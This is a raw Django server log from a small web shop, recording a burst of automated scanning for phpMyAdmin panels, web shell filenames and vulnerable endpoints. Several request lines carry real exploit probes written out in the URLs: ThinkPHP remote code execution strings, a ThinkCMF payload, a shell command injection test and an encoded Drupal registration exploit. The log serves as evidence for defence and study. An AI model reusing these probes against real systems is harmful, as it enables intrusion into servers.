/phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6692 Not Found: /pma/scripts/setup.php [08/Dec/2019 10:57:45] "GET /pma/scripts/setup.php HTTP/1.0" 404 6656 Not Found: /MyAdmin/scripts/setup.php [08/Dec/2019 10:57:53] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6668 Not Found: /pma/scripts/db___.init.php [08/Dec/2019 10:57:54] "GET /pma/scripts/db___.init.php HTTP/1.0" 404 6671 Not Found: /PMA/scripts/db___.init.php [08/Dec/2019 10:57:55] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6671 Not Found: /myadmin/scripts/db___.init.php [08/Dec/2019 10:57:56] "GET /myadmin/scripts/db___.init.php HTTP/1.0" 404 6683 Not Found: /MyAdmin/scripts/db___.init.php [08/Dec/2019 10:57:56] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6683 Not Found: /plugins/weathermap/editor.php [08/Dec/2019 10:57:57] "GET /plugins/weathermap/editor.php HTTP/1.0" 404 6680 Not Found: /weathermap/editor.php [08/Dec/2019 10:58:08] "GET /weathermap/editor.php HTTP/1.0" 404 6656 Not Found: /index.php [08/Dec/2019 10:58:10] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6867 Not Found: /elrekt.php [08/Dec/2019 10:58:11] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6870 Not Found: /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} [08/Dec/2019 10:58:15] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6771 Not Found: /index.php [08/Dec/2019 10:58:17] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6676 [08/Dec/2019 10:58:19] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [08/Dec/2019 10:58:19] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 10:58:19,686 utils 32196 139885061072640 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) Not Found: /joomla/ [08/Dec/2019 10:58:19] "GET /joomla/ HTTP/1.0" 404 1728 DEBUG 2019-12-08 10:58:20,419 utils 32196 139885061072640 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'Joomla'; args=('Joomla',) Not Found: /Joomla/ [08/Dec/2019 10:58:20] "GET /Joomla/ HTTP/1.0" 404 1728 [08/Dec/2019 10:58:22] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.0" 302 0 Not Found: /d7.php [08/Dec/2019 10:58:22] "GET /d7.php HTTP/1.0" 404 6611 Not Found: /rxr.php [08/Dec/2019 10:58:24] "GET /rxr.php HTTP/1.0" 404 6614 Not Found: /1x.php [08/Dec/2019 10:58:25] "GET /1x.php HTTP/1.0" 404 6611 Not Found: /home.php [08/Dec/2019 10:58:27] "GET /home.php HTTP/1.0" 404 6617 Not Found: /undx.php [08/Dec/2019 10:58:29] "GET /undx.php HTTP/1.0" 404 6617 Not Found: /spider.php [08/Dec/2019 10:58:31] "GET /spider.php HTTP/1.0" 404 6623 Not Found: /payload.php [08/Dec/2019 10:58:33] "GET /payload.php HTTP/1.0" 404 6626 Not Found: /izom.php [08/Dec/2019 10:58:37] "GET /izom.php HTTP/1.0" 404 6617 Not Found: /composer.php [08/Dec/2019 10:58:38] "GET /composer.php HTTP/1.0" 404 6629 Not Found: /hue2.php [08/Dec/2019 10:58:39] "GET /hue2.php HTTP/1.0" 404 6617 Not Found: /lang.php [08/Dec/2019 10:58:43] "GET /lang.php?f=1 HTTP/1.0" 404 6621 Not Found: /izom.php [08/Dec/2019 10:58:43] "GET /izom.php HTTP/1.0" 404 6617 Not Found: /payload.php [08/Dec/2019 10:58:48] "GET /payload.php HTTP/1.0" 404 6626 Not Found: /new_license.php [08/Dec/2019 10:58:48] "GET /new_license.php HTTP/1.0" 404 6638 Not Found: /images/!.php [08/Dec/2019 10:58:49] "GET /images/!.php HTTP/1.0" 404 6629 Not Found: /hd.php [08/Dec/2019 10:58:53] "GET /hd.php HTTP/1.0" 404 6611 Not Found: /images/up.php [08/Dec/2019 10:58:54] "GET /images/up.php HTTP/1.0" 404 6632 Not Found: /images/attari.php [08/Dec/2019 10:58:56] "GET /images/attari.php HTTP/1.0" 404 6644 Not Found: /images/jsspwneed.php [08/Dec/2019 10:58:56] "GET /images/jsspwneed.php HTTP/1.0" 404 6653 Not Found: /images/stories/filemga.php [08/Dec/2019 10:59:02] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6682 Not Found: /laravel.php [08/Dec/2019 10:59:16] "GET /laravel.php HTTP/1.0" 404 6626 Not Found: /huoshan.php [08/Dec/2019 10:59:16] "GET /huoshan.php HTTP/1.0" 404 6626 Not Found: /yu.php [08/Dec/2019 10:59:17] "GET /yu.php HTTP/1.0" 404 6611 Not Found: /floaw.php [08/Dec/2019 10:59:18] "GET /floaw.php HTTP/1.0" 404 6620 Not Found: /ftmabc.php [08/Dec/2019 10:59:21] "GET /ftmabc.php HTTP/1.0" 404 6623 Not Found: /doudou.php [08/Dec/2019 10:59:22] "GET /doudou.php HTTP/1.0" 404 6623 Not Found: /mjx.php [08/Dec/2019 10:59:24] "GET /mjx.php HTTP/1.0" 404 6614 Not Found: /xiaoxia.php [08/Dec/2019 10:59:26] "GET /xiaoxia.php HTTP/1.0" 404 6626 Not Found: /zz.php [08/Dec/2019 10:59:31] "GET /zz.php HTTP/1.0" 404 6611 Not Found: /coonig.php [08/Dec/2019 10:59:36] "GET /coonig.php HTTP/1.0" 404 6623 Not Found: /hhhhhh.php [08/Dec/2019 10:59:46] "GET /hhhhhh.php HTTP/1.0" 404 6623 Not Found: /meijianxue.php [08/Dec/2019 10:59:47] "GET /meijianxue.php HTTP/1.0" 404 6635 Not Found: /no1.php [08/Dec/2019 10:59:47] "GET /no1.php HTTP/1.0" 404 6614 Not Found: /python.php [08/Dec/2019 10:59:48] "GET /python.php HTTP/1.0" 404 6623 Not Found: /woshimengmei.php [08/Dec/2019 10:59:49] "GET /woshimengmei.php HTTP/1.0" 404 6641 Not Found: /indea.php [08/Dec/2019 10:59:50] "GET /indea.php HTTP/1.0" 404 6620 Not Found: /taisui.php [08/Dec/2019 10:59:52] "GET /taisui.php HTTP/1.0" 404 6623 Not Found: /xiaxia.php [08/Dec/2019 10:59:54] "GET /xiaxia.php HTTP/1.0" 404 6623 Not Found: /kk.php [08/Dec/2019 10:59:58] "GET /kk.php HTTP/1.0" 404 6611 Not Found: /xsser.php [08/Dec/2019 10:59:59] "GET /xsser.php HTTP/1.0" 404 6620 Not Found: /zzz.php [08/Dec/2019 11:00:01] "GET /zzz.php HTTP/1.0" 404 6614 Not Found: /99.php [08/Dec/2019 11:00:03] "GET /99.php HTTP/1.0" 404 6611 Not Found: /dp.php [08/Dec/2019 11:00:05] "GET /dp.php HTTP/1.0" 404 6611 Not Found: /hs.php [08/Dec/2019 11:00:06] "GET /hs.php HTTP/1.0" 404 6611 Not Found: /1ts.php [08/Dec/2019 11:00:08] "GET /1ts.php HTTP/1.0" 404 6614 Not Found: /haiyan.php [08/Dec/2019 11:00:10] "GET /haiyan.php HTTP/1.0" 404 6623 Not Found: /phpdm.php [08/Dec/2019 11:00:15] "GET /phpdm.php HTTP/1.0" 404 6620 Not Found: /root.php [08/Dec/2019 11:00:15] "GET /root.php HTTP/1.0" 404 6617 Not Found: /5678.php [08/Dec/2019 11:00:16] "GET /5678.php HTTP/1.0" 404 6617 Not Found: /root11.php [08/Dec/2019 11:00:17] "GET /root11.php HTTP/1.0" 404 6623 Not Found: /xiu.php [08/Dec/2019 11:00:17] "GET /xiu.php HTTP/1.0" 404 6614 Not Found: /wuwu11.php [08/Dec/2019 11:00:18] "POST /wuwu11.php HTTP/1.0" 404 6624 Not Found: /xw.php [08/Dec/2019 11:00:19] "POST /xw.php HTTP/1.0" 404 6612 Not Found: /xw1.php [08/Dec/2019 11:00:20] "POST /xw1.php HTTP/1.0" 404 6615 Not Found: /9678.php [08/Dec/2019 11:00:21] "POST /9678.php HTTP/1.0" 404 6618 Not Found: /wc.php [08/Dec/2019 11:00:22] "POST /wc.php HTTP/1.0" 404 6612 Not Found: /xx.php [08/Dec/2019 11:00:22] "POST /xx.php HTTP/1.0" 404 6612 Not Found: /xx.php [08/Dec/2019 11:00:23] "POST /xx.php HTTP/1.0" 404 6612 Not Found: /w.php [08/Dec/2019 11:00:29] "POST /w.php HTTP/1.0" 404 6609 Not Found: /sheep.php [08/Dec/2019 11:00:30] "POST /sheep.php HTTP/1.0" 404 6621 Not Found: /qaq.php [08/Dec/2019 11:00:35] "POST /qaq.php HTTP/1.0" 404 6615 Not Found: /qq.php [08/Dec/2019 11:00:41] "POST /qq.php HTTP/1.0" 404 6612 Not Found: /hhh.php [08/Dec/2019 11:00:55] "POST /hhh.php HTTP/1.0" 404 6615 Not Found: /jjj.php [08/Dec/2019 11:00:57] "POST /jjj.php HTTP/1.0" 404 6615 Not Found: /vvv.php [08/Dec/2019 11:00:59] "POST /vvv.php HTTP/1.0" 404 6615 Not Found: /www.php [08/Dec/2019 11:00:59] "POST /www.php HTTP/1.0" 404 6615 Not Found: /ffr.php [08/Dec/2019 11:01:00] "POST /ffr.php HTTP/1.0" 404 6615 Not Found: /415.php [08/Dec/2019 11:01:05] "POST /415.php HTTP/1.0" 404 6615 Not Found: /421.php [08/Dec/2019 11:01:05] "POST /421.php HTTP/1.0" 404 6615 Not Found: /444.php [08/Dec/2019 11:01:06] "POST /444.php HTTP/1.0" 404 6615 Not Found: /a411.php [08/Dec/2019 11:01:07] "POST /a411.php HTTP/1.0" 404 6618 Not Found: /whoami.php [08/Dec/2019 11:01:08] "POST /whoami.php HTTP/1.0" 404 6624 Not Found: /9.php [08/Dec/2019 11:01:15] "POST /9.php HTTP/1.0" 404 6609 Not Found: /98k.php [08/Dec/2019 11:01:18] "POST /98k.php HTTP/1.0" 404 6615 Not Found: /981.php [08/Dec/2019 11:01:19] "POST /981.php HTTP/1.0" 404 6615 Not Found: /aa.php [08/Dec/2019 11:01:28] "POST /aa.php HTTP/1.0" 404 6612 Not Found: /bb.php [08/Dec/2019 11:01:29] "POST /bb.php HTTP/1.0" 404 6612 Not Found: /pp.php [08/Dec/2019 11:01:31] "POST /pp.php HTTP/1.0" 404 6612 Not Found: /tt.php [08/Dec/2019 11:01:32] "POST /tt.php HTTP/1.0" 404 6612 Not Found: /bbq.php [08/Dec/2019 11:01:34] "POST /bbq.php HTTP/1.0" 404 6615 Not Found: /jj1.php [08/Dec/2019 11:01:34] "POST /jj1.php HTTP/1.0" 404 6615 Not Found: /jbb.php [08/Dec/2019 11:01:35] "POST /jbb.php HTTP/1.0" 404 6615 Not Found: /qwq.php [08/Dec/2019 11:01:40] "POST /qwq.php HTTP/1.0" 404 6615 [08/Dec/2019 11:01:40] "GET / HTTP/1.0" 302 0 Not Found: /nb.php [08/Dec/2019 11:01:40] "POST /nb.php HTTP/1.0" 404 6612 Not Found: /hgx.php [08/Dec/2019 11:01:45] "POST /hgx.php HTTP/1.0" 404 6615 Not Found: /ppl.php [08/Dec/2019 11:01:46] "POST /ppl.php HTTP/1.0" 404 6615 Not Found: /tty.php [08/Dec/2019 11:01:55] "POST /tty.php HTTP/1.0" 404 6615 Not Found: /ooi.php [08/Dec/2019 11:01:56] "POST /ooi.php HTTP/1.0" 404 6615 Not Found: /aap.php [08/Dec/2019 11:01:58] "POST /aap.php HTTP/1.0" 404 6615 Not Found: /app.php [08/Dec/2019 11:01:59] "POST /app.php HTTP/1.0" 404 6615 Not Found: /bbr.php [08/Dec/2019 11:01:59] "POST /bbr.php HTTP/1.0" 404 6615 Not Found: /ioi.php [08/Dec/2019 11:02:00] "POST /ioi.php HTTP/1.0" 404 6615 Not Found: /uuu.php [08/Dec/2019 11:02:02] "POST /uuu.php HTTP/1.0" 404 6615 Not Found: /yyy.php [08/Dec/2019 11:02:04] "POST /yyy.php HTTP/1.0" 404 6615 Not Found: /seeyon/htmlofficeservlet [08/Dec/2019 11:02:26] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6665 Not Found: /secure/ContactAdministrators!default.jspa [08/Dec/2019 11:02:29] "GET /secure/ContactAdministrators!default.jspa HTTP/1.0" 404 6716 Not Found: /weaver/bsh.servlet.BshServlet [08/Dec/2019 11:02:33] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6680 DEBUG 2019-12-08 11:02:35,810 utils 32196 139885061072640 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'solr'; args=('solr',) Not Found: /solr/ [08/Dec/2019 11:02:35] "GET /solr/ HTTP/1.0" 404 1724 Not Found: /index.php [08/Dec/2019 11:02:36] "POST /index.php HTTP/1.0" 404 6621 Not Found: /user/register [08/Dec/2019 11:02:38] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6870 [08/Dec/2019 11:02:40] "GET / HTTP/1.0" 302 0 Not Found: /user.php [08/Dec/2019 11:02:49] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6618 Not Found: /index.php [08/Dec/2019 11:02:50] "GET /index.php HTTP/1.0" 404 6620 Not Found: /phpmyadmin/index.php [08/Dec/2019 11:02:51] "GET /phpmyadmin/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin/index.php [08/Dec/2019 11:02:51] "GET /phpMyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /pmd/index.php [08/Dec/2019 11:02:52] "GET /pmd/index.php HTTP/1.0" 404 6632 Not Found: /pma/index.php [08/Dec/2019 11:02:53] "GET /pma/index.php HTTP/1.0" 404 6632 Not Found: /PMA/index.php [08/Dec/2019 11:02:54] "GET /PMA/index.php HTTP/1.0" 404 6632 Not Found: /PMA2/index.php [08/Dec/2019 11:02:56] "GET /PMA2/index.php HTTP/1.0" 404 6635 Not Found: /pmamy/index.php [08/Dec/2019 11:02:58] "GET /pmamy/index.php HTTP/1.0" 404 6638 Not Found: /pmamy2/index.php [08/Dec/2019 11:02:59] "GET /pmamy2/index.php HTTP/1.0" 404 6641 Not Found: /mysql/index.php [08/Dec/2019 11:02:59] "GET /mysql/index.php HTTP/1.0" 404 6638 Not Found: /admin/index.php [08/Dec/2019 11:03:00] "GET /admin/index.php HTTP/1.0" 404 9245 Not Found: /db/index.php [08/Dec/2019 11:03:01] "GET /db/index.php HTTP/1.0" 404 6629 Not Found: /dbadmin/index.php [08/Dec/2019 11:03:03] "GET /dbadmin/index.php HTTP/1.0" 404 6644 Not Found: /web/phpMyAdmin/index.php [08/Dec/2019 11:03:04] "GET /web/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /admin/pma/index.php [08/Dec/2019 11:03:08] "GET /admin/pma/index.php HTTP/1.0" 404 9257 Not Found: /admin/PMA/index.php [08/Dec/2019 11:03:08] "GET /admin/PMA/index.php HTTP/1.0" 404 9257 Not Found: /admin/mysql/index.php [08/Dec/2019 11:03:10] "GET /admin/mysql/index.php HTTP/1.0" 404 9263 Not Found: /admin/mysql2/index.php [08/Dec/2019 11:03:11] "GET /admin/mysql2/index.php HTTP/1.0" 404 9266 Not Found: /admin/phpMyAdmin/index.php [08/Dec/2019 11:03:15] "GET /admin/phpMyAdmin/index.php HTTP/1.0" 404 9278 Not Found: /admin/phpmyadmin2/index.php [08/Dec/2019 11:03:17] "GET /admin/phpmyadmin2/index.php HTTP/1.0" 404 9281 Not Found: /mysqladmin/index.php [08/Dec/2019 11:03:19] "GET /mysqladmin/index.php HTTP/1.0" 404 6653 Not Found: /mysql-admin/index.php [08/Dec/2019 11:03:20] "GET /mysql-admin/index.php HTTP/1.0" 404 6656 Not Found: /phpadmin/index.php [08/Dec/2019 11:03:25] "GET /phpadmin/index.php HTTP/1.0" 404 6647 Not Found: /phpAdmin/index.php [08/Dec/2019 11:03:27] "GET /phpAdmin/index.php HTTP/1.0" 404 6647 Not Found: /phpmyadmin2/index.php [08/Dec/2019 11:03:33] "GET /phpmyadmin2/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmin-4.4.0/index.php [08/Dec/2019 11:03:34] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6671 Not Found: /phpMyAdmin4.8.1/index.php [08/Dec/2019 11:03:39] "GET /phpMyAdmin4.8.1/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.2/index.php [08/Dec/2019 11:03:40] "GET /phpMyAdmin4.8.2/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.3/index.php [08/Dec/2019 11:03:41] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.4/index.php [08/Dec/2019 11:03:43] "GET /phpMyAdmin4.8.4/index.php HTTP/1.0" 404 6668 Not Found: /phpMyAdmin4.8.5/index.php [08/Dec/2019 11:03:45] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6668 Not Found: /myadmin/index.php [08/Dec/2019 11:03:47] "GET /myadmin/index.php HTTP/1.0" 404 6644 Not Found: /myadmin2/index.php [08/Dec/2019 11:03:47] "GET /myadmin2/index.php HTTP/1.0" 404 6647 Not Found: /xampp/phpmyadmin/index.php [08/Dec/2019 11:03:48] "GET /xampp/phpmyadmin/index.php HTTP/1.0" 404 6671 Not Found: /www/phpMyAdmin/index.php [08/Dec/2019 11:03:55] "GET /www/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /tools/phpMyAdmin/index.php [08/Dec/2019 11:03:56] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6671 Not Found: /phpmyadmin-old/index.php [08/Dec/2019 11:03:58] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdminold/index.php [08/Dec/2019 11:03:58] "GET /phpMyAdminold/index.php HTTP/1.0" 404 6662 Not Found: /phpMyAdmin.old/index.php [08/Dec/2019 11:03:59] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6665 Not Found: /pma-old/index.php [08/Dec/2019 11:04:00] "GET /pma-old/index.php HTTP/1.0" 404 6644 Not Found: /claroline/phpMyAdmin/index.php [08/Dec/2019 11:04:02] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6683 Not Found: /typo3/phpmyadmin/index.php [08/Dec/2019 11:04:04] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6671 Not Found: /phpma/index.php [08/Dec/2019 11:04:26] "GET /phpma/index.php HTTP/1.0" 404 6638 Not Found: /phpMyAdmin/phpMyAdmin/index.php [08/Dec/2019 11:04:35] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.0" 404 6686 Not Found: /phpMyAbmin/index.php [08/Dec/2019 11:04:35] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin+++---/index.php [08/Dec/2019 11:04:39] "GET /phpMyAdmin+++---/index.php HTTP/1.0" 404 6671 Not Found: /v/index.php [08/Dec/2019 11:04:41] "GET /v/index.php HTTP/1.0" 404 6626 Not Found: /phpmyadm1n/index.php [08/Dec/2019 11:04:43] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdm1n/index.php [08/Dec/2019 11:04:44] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6653 Not Found: /phpMyadmi/index.php [08/Dec/2019 11:04:48] "GET /phpMyadmi/index.php HTTP/1.0" 404 6650 Not Found: /MyAdmin/index.php [08/Dec/2019 11:04:54] "GET /MyAdmin/index.php HTTP/1.0" 404 6644 Not Found: /phpMyAdmin1/index.php [08/Dec/2019 11:04:55] "GET /phpMyAdmin1/index.php HTTP/1.0" 404 6656 Not Found: /pwd/index.php [08/Dec/2019 11:04:59] "GET /pwd/index.php HTTP/1.0" 404 6632 Not Found: /phpMyAdmina/index.php [08/Dec/2019 11:05:00] "GET /phpMyAdmina/index.php HTTP/1.0" 404 6656 Not Found: /phpMydmin/index.php [08/Dec/2019 11:05:00] "GET /phpMydmin/index.php HTTP/1.0" 404 6650 Not Found: /phpMyAdmins/index.php [08/Dec/2019 11:05:01] "GET /phpMyAdmins/index.php HTTP/1.0" 404 6656 Not Found: /phpMyAdmin._/index.php [08/Dec/2019 11:05:02] "GET /phpMyAdmin._/index.php HTTP/1.0" 404 6659 Not Found: /phpMyAdmin._2/index.php [08/Dec/2019 11:05:04] "GET /phpMyAdmin._2/index.php HTTP/1.0" 404 6662 Not Found: /phpmyadmin2222/index.php [08/Dec/2019 11:05:04] "GET /phpmyadmin2222/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdmin333/index.php [08/Dec/2019 11:05:05] "GET /phpMyAdmin333/index.php HTTP/1.0" 404 6662 Not Found: /phpmyadmin3333/index.php [08/Dec/2019 11:05:09] "GET /phpmyadmin3333/index.php HTTP/1.0" 404 6665 Not Found: /php2MyAdmin/index.php [08/Dec/2019 11:05:13] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6656 Not Found: /phpiMyAdmin/index.php [08/Dec/2019 11:05:13] "GET /phpiMyAdmin/index.php HTTP/1.0" 404 6656 Not Found: /phpNyAdmin/index.php [08/Dec/2019 11:05:14] "GET /phpNyAdmin/index.php HTTP/1.0" 404 6653 Not Found: /1/index.php [08/Dec/2019 11:05:16] "GET /1/index.php HTTP/1.0" 404 6626 Not Found: /download/index.php [08/Dec/2019 11:05:17] "GET /download/index.php HTTP/1.0" 404 6647 Not Found: /phpMyAdmin_111/index.php [08/Dec/2019 11:05:20] "GET /phpMyAdmin_111/index.php HTTP/1.0" 404 6665 Not Found: /phpmadmin/index.php [08/Dec/2019 11:05:21] "GET /phpmadmin/index.php HTTP/1.0" 404 6650 Not Found: /321/index.php [08/Dec/2019 11:05:22] "GET /321/index.php HTTP/1.0" 404 6632 Not Found: /sbb/index.php [08/Dec/2019 11:05:31] "GET /sbb/index.php HTTP/1.0" 404 6632 Not Found: /WWW/phpMyAdmin/index.php [08/Dec/2019 11:05:33] "GET /WWW/phpMyAdmin/index.php HTTP/1.0" 404 6665 Not Found: /phpMyAdmln/index.php [08/Dec/2019 11:05:34] "GET /phpMyAdmln/index.php HTTP/1.0" 404 6653 Not Found: /phpMyAdmin_ai/index.php [08/Dec/2019 11:05:34] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6662 Not Found: /__phpMyAdmin/index.php [08/Dec/2019 11:05:37] "GET /__phpMyAdmin/index.php HTTP/1.0" 404 6659 Not Found: /shopdb/index.php [08/Dec/2019 11:05:40] "GET /shopdb/index.php HTTP/1.0" 404 6641 Not Found: /phppma/index.php [08/Dec/2019 11:05:41] "GET /phppma/index.php HTTP/1.0" 404 6641 Not Found: /phpmy/index.php [08/Dec/2019 11:05:43] "GET /phpmy/index.php HTTP/1.0" 404 6638 Not Found: /mysql/admin/index.php [08/Dec/2019 11:05:44] "GET /mysql/admin/index.php HTTP/1.0" 404 6656 Not Found: /mysql/sqlmanager/index.php [08/Dec/2019 11:05:48] "GET /mysql/sqlmanager/index.php HTTP/1.0" 404 6671 Not Found: /mysql/mysqlmanager/index.php [08/Dec/2019 11:05:50] "GET /mysql/mysqlmanager/index.php HTTP/1.0" 404 6677 Not Found: /sqladmin/index.php [08/Dec/2019 11:05:54] "GET /sqladmin/index.php HTTP/1.0" 404 6647 Not Found: /sql/index.php [08/Dec/2019 11:05:54] "GET /sql/index.php HTTP/1.0" 404 6632 Not Found: /SQL/index.php [08/Dec/2019 11:05:55] "GET /SQL/index.php HTTP/1.0" 404 6632 Not Found: /websql/index.php [08/Dec/2019 11:05:56] "GET /websql/index.php HTTP/1.0" 404 6641 Not Found: /MySQLAdmin/index.php [08/Dec/2019 11:05:57] "GET /MySQLAdmin/index.php HTTP/1.0" 404 6653 Not Found: /manager/html [08/Dec/2019 11:05:59] "GET /manager/html HTTP/1.0" 404 6629 [08/Dec/2019 11:10:04] "GET / HTTP/1.0" 302 0 [08/Dec/2019 11:15:07] "GET / HTTP/1.0" 302 0 [08/Dec/2019 11:20:10] "GET / HTTP/1.0" 302 0 [08/Dec/2019 11:25:12] "GET / HTTP/1.0" 302 0 [08/Dec/2019 11:33:27] "GET / HTTP/1.0" 302 0 [08/Dec/2019 11:38:30] "GET / HTTP/1.0" 302 0 [08/Dec/2019 11:40:39] "GET / HTTP/1.0" 302 0 [08/Dec/2019 11:44:07] "GET / HTTP/1.0" 302 0 [08/Dec/2019 11:51:57] "GET / HTTP/1.0" 302 0 [08/Dec/2019 11:57:00] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:10:06] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:23:59] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:29:02] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:34:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:39:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:40:01] "GET /whm-server-status HTTP/1.0" 301 0 [08/Dec/2019 12:44:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:49:13] "GET / HTTP/1.0" 302 0 [08/Dec/2019 12:58:22] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:10:05] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:15:08] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:19:51] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:20:11] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:25:14] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:30:17] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:34:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 13:34:11,517 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'pupf9l3wzzkwe2l2x37rfmredft51xa1' LIMIT 1; args=('pupf9l3wzzkwe2l2x37rfmredft51xa1',) DEBUG 2019-12-08 13:34:11,520 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('pupf9l3wzzkwe2l2x37rfmredft51xa1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T13:34:11.518222+00:00'::timestamptz); args=('pupf9l3wzzkwe2l2x37rfmredft51xa1', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 22, 13, 34, 11, 518222, tzinfo=)) [08/Dec/2019 13:34:11] "GET /login/?next=/ HTTP/1.0" 200 1786 [08/Dec/2019 13:35:20] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:40:13] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:40:23] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:45:26] "GET / HTTP/1.0" 302 0 [08/Dec/2019 13:49:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-08 13:49:58,457 utils 32196 139885061072640 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'y4pp8z5rbrjpsgm73xjd4ladun71ht05' LIMIT 1; args=('y4pp8z5rbrjpsgm73xjd4ladun71ht05',) DEBUG 2019-12-08 13:49:58,460 utils 32196 139885061072640 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('y4pp8z5rbrjpsgm73xjd4ladun71ht05', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-22T13:49:58.458459+00:00'::timestamptz); args=('y4pp8z5rbrjpsgm73xjd4ladun71ht05', 